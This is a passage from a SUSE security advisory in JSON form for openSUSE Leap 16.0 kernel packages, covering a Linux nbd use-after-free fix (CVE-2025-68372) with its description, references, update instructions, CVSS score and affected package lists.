"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68368"
},
{
"cve": "CVE-2025-68372",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68372"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnbd: defer config put in recv_work\n\nThere is one uaf issue in recv_work when running NBD_CLEAR_SOCK and\nNBD_CMD_RECONFIGURE:\n nbd_genl_connect // conf_ref=2 (connect and recv_work A)\n nbd_open\t // conf_ref=3\n recv_work A done // conf_ref=2\n NBD_CLEAR_SOCK // conf_ref=1\n nbd_genl_reconfigure // conf_ref=2 (trigger recv_work B)\n close nbd\t // conf_ref=1\n recv_work B\n config_put // conf_ref=0\n atomic_dec(\u0026config-\u003erecv_threads); -\u003e UAF\n\nOr only running NBD_CLEAR_SOCK:\n nbd_genl_connect // conf_ref=2\n nbd_open \t // conf_ref=3\n NBD_CLEAR_SOCK // conf_ref=2\n close nbd\n nbd_release\n config_put // conf_ref=1\n recv_work\n config_put \t // conf_ref=0\n atomic_dec(\u0026config-\u003erecv_threads); -\u003e UAF\n\nCommit 87aac3a80af5 (\"nbd: call nbd_config_put() before notifying the\nwaiter\") moved nbd_config_put() to run before waking up the waiter in\nrecv_work, in order to ensure that nbd_start_device_ioctl() would not\nbe woken up while nbd-\u003etask_recv was still uncleared.\n\nHowever, in nbd_start_device_ioctl(), after being woken up it explicitly\ncalls flush_workqueue() to make sure all current works are finished.\nTherefore, there is no need to move the config put ahead of the wakeup.\n\nMove nbd_config_put() to the end of recv_work, so that the reference is\nheld for the whole lifetime of the worker thread. This makes sure the\nconfig cannot be freed while recv_work is still running, even if clear\n+ reconfigure interleave.\n\nIn addition, we don\u0027t need to worry about recv_work dropping the last\nnbd_put (which causes deadlock):\n\npath A (netlink with NBD_CFLAG_DESTROY_ON_DISCONNECT):\n connect // nbd_refs=1 (trigger recv_work)\n open nbd // nbd_refs=2\n NBD_CLEAR_SOCK\n close nbd\n nbd_release\n nbd_disconnect_and_put\n flush_workqueue // recv_work done\n nbd_config_put\n nbd_put // nbd_refs=1\n nbd_put // nbd_refs=0\n queue_work\n\npath B (netlink without NBD_CFLAG_DESTROY_ON_DISCONNECT):\n connect // nbd_refs=2 (trigger recv_work)\n open nbd // nbd_refs=3\n NBD_CLEAR_SOCK // conf_refs=2\n close nbd\n nbd_release\n nbd_config_put // conf_refs=1\n nbd_put // nbd_refs=2\n recv_work done // conf_refs=0, nbd_refs=1\n rmmod // nbd_refs=0\n\nDepends-on: e2daec488c57 (\"nbd: Fix hungtask when nbd_config_put\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68372",
"url": "https://www.suse.com/security/cve/CVE-2025-68372"
},
{
"category": "external",
"summary": "SUSE Bug 1255537 for CVE-2025-68372",
"url": "https://bugzilla.suse.com/1255537"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
